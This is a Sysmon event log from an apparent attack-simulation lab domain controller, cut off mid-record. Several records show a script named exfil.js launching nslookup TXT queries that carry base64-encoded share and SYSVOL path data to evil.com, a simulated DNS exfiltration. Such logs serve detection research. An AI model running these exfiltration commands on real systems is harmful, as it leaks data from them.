10341000x8000000000000000202194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.099{2E1864BB-17A1-629A-783D-000000005F02}55522040C:\Windows\System32\WScript.exe{2E1864BB-17C6-629A-2E41-000000005F02}7192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.113{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.113{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.099{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.099{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.111{2E1864BB-17C6-629A-2E41-000000005F02}7192C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlimnq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.099{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcjco.tmpMD5=88CB44002509C6BB2D4BC0ADC4A5E028,SHA256=FA57CD8CDA118516C9A4FB97A60BCAFFDFC289CB501CF1DABE54CCC933EB8213,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.066{2E1864BB-17C6-629A-2C41-000000005F02}73762444C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-2D41-000000005F02}2824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.066{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.066{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.066{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.066{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.066{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-2D41-000000005F02}2824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.066{2E1864BB-17C6-629A-2B41-000000005F02}73244592C:\Windows\system32\cmd.exe{2E1864BB-17C6-629A-2D41-000000005F02}2824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.074{2E1864BB-17C6-629A-2D41-000000005F02}2824C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C6-629A-2B41-000000005F02}7324C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcjco.tmp 2>&1 10341000x8000000000000000202179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.051{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-2C41-000000005F02}7376C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.051{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-2C41-000000005F02}7376C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.051{2E1864BB-17C6-629A-2C41-000000005F02}73762444C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-2B41-000000005F02}7324C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.035{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-2C41-000000005F02}7376C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.035{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.035{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.035{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.035{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.035{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-2B41-000000005F02}7324C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.035{2E1864BB-17A1-629A-783D-000000005F02}55528000C:\Windows\System32\WScript.exe{2E1864BB-17C6-629A-2B41-000000005F02}7324C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.039{2E1864BB-17C6-629A-2B41-000000005F02}7324C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcjco.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.035{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nligds.tmpMD5=CB596D298926BB7548136A14BD30FF7C,SHA256=F828C268F75B06BE1AA98CB1BF6D08702D0B68C46C1A2B67F8CB9ED67478BB62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.013{2E1864BB-17C5-629A-2941-000000005F02}74125740C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-2A41-000000005F02}7836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.013{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.013{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+5